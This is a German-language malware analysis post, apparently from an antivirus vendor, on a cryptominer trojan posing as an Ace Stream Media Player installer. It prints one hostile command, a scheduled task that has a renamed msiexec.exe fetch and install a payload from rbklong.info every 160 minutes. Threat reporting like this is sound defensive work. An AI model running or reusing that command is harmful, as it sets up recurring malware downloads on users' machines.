CryptoMiner, WinstarNssmMiner, tarnt sich als Media Player und infiziert an einem Tag 60.000 Geräte

Juli 10, 2018360TS
Mehr Infos zum 360 Total Security

360 Security Center hat einen bestimmten CrytoMiner-Trojaner, der sich aktiv verbreitet und an einem Tag bereits 60.000 Computer infiziert hat, entdeckt. Er ist eine Variante von WinstarNssmMiner und tarnt sich in Form verschiedener Installationsprogramme für ein Hilfsprogramm, wie Ace Stream Media Player. Wir haben dem Trojaner den Namen “WinstarNssmMiner4” gegeben. Diese Version wird im Vergleich zur letzten Version von bekannter, guter Software wie Wget heruntergeladen und verbreitet. Damit werden alle Ausführungs-Scripts verschleiert, um eine Erkennung durch ein Antivirusprogramm zu verhindern. Es ist sehr zu empfehlen, Software von offiziellen Websites statt von unbekannten Quellen herunterzuladen.

Analyse

Der Trojaner tarnt sich als ein Installationsprogramm des Ace Stream Media Player. Er wird im MSI-Format gebaut und enthält zwei Batch-Dateien, eine uzip-Extrahierungsdatei und eine Wget-zip-Datei.

Dem Skript wurden eine Menge sinnloser Zeichen hinzugefügt, um die schädlichen Skripts zu verwirren. Diese Art der Verschleierung füllt das Skript mit zufälligen leeren Werten, um eine Erkennung durch ein Antivirusprogamm zu vermeiden. Der Vergleich zwischen wiederhergestellter Datei und verschleierter Datei von ALL.bat wird unten gezeigt.

ALL.bat prüft, ob eine Antivirus-Software wie Kaspersky, ESET oder DrWeb installiert wurde. Es löscht alle Dateien, die mit dem Trojaner zusammenhängen und beendet den Prozess, wenn es im System eines dieser Antivirus-Softwareprogramme gibt. Ansonsten wird Wget extrahiert, um das Installationsprogramm von Ace Stream Media Player herunterzuladen, und es wird die Batch-Datei i.bat ausgeführt, um den Trojaner zu installieren.

i.bat wird auch verschleiert. Der Unterschied zur wiederhergestellten Datei wird unten gezeigt.

i.bat fügt eine geplante Aufgabe zum Herunterladen des Cryptominer hinzu. Der Trojaner dupliziert die Systemdatei „msiexec.exe” mit einem zufälligen Dateinamen und erstellt den Inhalt der Aufgabe durch eine URL in Verbindung mit dem Domainnamen „rbklong.info”. Es vermeidet eine Erkennung durch ein Antivirusprogramm durch das Datei-Download-Feature von MSI.
Die geplante Aufgabe führt den Befehl unten in der Befehlszeile aus:
schtasks /create /tn „TEST-18721“ /tr „‚C:\WINDOWS\System32\2632313938.exe‘ /i http://rbklong.info/13938.ace /q“ /sc minute /mo 160 /rl highest /f

2632313938.exe ist die umbenannte msiexec.exe. Derzeit kann auf die URL nicht zugegriffen werden. Sobald die URL online ist, wird die geplante Aufgabe den Trojaner ausführen, um alle 160 Minuten zur Aktualisierung auf die URL zuzugreifen. So wird der Nutzer infiziert.

Wget wird auch zur Beförderung und zum Download des Installationsprogramms durch die URL http://dl.acestream.org/Ace_Stream_Media_3.1.28.exe genutzt.

Erinnerung

In letzter Zeit haben wir festgestellt, dass sich viele CryptoMiner-Trojaner in freier Wildbahn ausbreiten. Wir empfehlen Anwendern dringend, bei der Installation neuer Anwendungen Antivirus-Software einzusetzen. Anwendern wird auch empfohlen, gemeinsam mit 360 Total Security einen Virenscanner laufen zu lassen, um nicht zum CryptoMiner-Opfer zu werden.

Mehr Infos zum 360 Total Security